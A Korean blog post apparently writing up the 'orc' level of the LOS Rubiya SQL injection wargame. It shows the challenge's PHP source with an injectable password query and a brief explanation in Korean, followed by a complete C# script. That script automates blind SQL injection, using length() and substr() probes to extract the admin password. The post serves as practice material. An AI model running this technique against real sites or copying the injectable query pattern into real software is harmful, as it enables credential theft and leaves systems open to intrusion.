LOS Rubiya orc

2019. 8. 5. 22:49Wargame & CTF/LOS Rubiya

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php 
  include "./config.php"
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello admin</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'== $_GET['pw'])) solve("orc"); 
  highlight_file(__FILE__); 
?>
cs


이제 비밀번호를 직접 맞추어야 한다.

length(pw)=1, length(pw)=2 등등 넣어가면서 직접 맞추어야 한다.

그 후에는 substr를 이용해서 pw 한글자씩 비교해가면서 pw를 맞추어야 한다.

다른사람들은 자바나 파이썬을 써서 나는 특별히(?) c#을 썼다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
using System.Linq;
using System.Net;
using System.Text.RegularExpressions;
using System;
 
namespace los_rubiya_orc
{
    class Program
    {
        static void Main(string[] args)
        {
            int length = 0;
            string url = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?", html, password = "";
            WebClient webClient = new WebClient();
            webClient.Headers.Add(HttpRequestHeader.Cookie, "PHPSESSID=a04v3gh0el0gu24pd67ts8tq1r");
            for(length = 1;;length++)
            {
                html = Regex.Replace(webClient.DownloadString(url + "pw=' or length(pw)=" + length + "%23"), "<.*?>"String.Empty);
                if(html.Contains("Hello admin"))
                {
                    break;
                }
            }
            Console.WriteLine("Length : " + length);
            for(int i = 1;i <= length;i++)
            {
                char pass = '0';
                while(true)
                {
                    html = Regex.Replace(webClient.DownloadString(url + "pw=' or id='admin' and substr(pw, " + i + ", 1) = '" + pass.ToString() + "'%23"), "<.*?>"String.Empty);
                    if(html.Contains("Hello admin"))
                    {
                        password += pass.ToString();
                        Console.WriteLine("Password Found : " + password);
                        break;
                    }
                    pass = up(pass);
                }
            }
            Console.WriteLine("All Password Found! Auto Solving...");
            html = Regex.Replace(webClient.DownloadString(url + "pw=" + password), "<.*?>"String.Empty);
            if(!html.Contains("ORC Clear!"))
            {
                Console.WriteLine("ERROR!");
                Console.WriteLine(html);
            }
            else
            {
                Console.WriteLine("OK");
            }
        }
 
        static char up(char password)
        {
            password++;
            if(password > '9' && password < 'a')
            {
                password = 'a';
            }
            return password;
        }
    }
}
cs


저작자표시 (새창열림)

'Wargame & CTF > LOS Rubiya' 카테고리의 다른 글

LOS Rubiya darkelf  (0) 2019.08.05
LOS Rubiya wolfman  (0) 2019.08.05
LOS Rubiya goblin  (0) 2019.08.05
LOS Rubiya cobolt  (0) 2019.08.05
LOS Rubiya gremlin  (0) 2019.08.05

관련글

댓글 0

티스토리툴바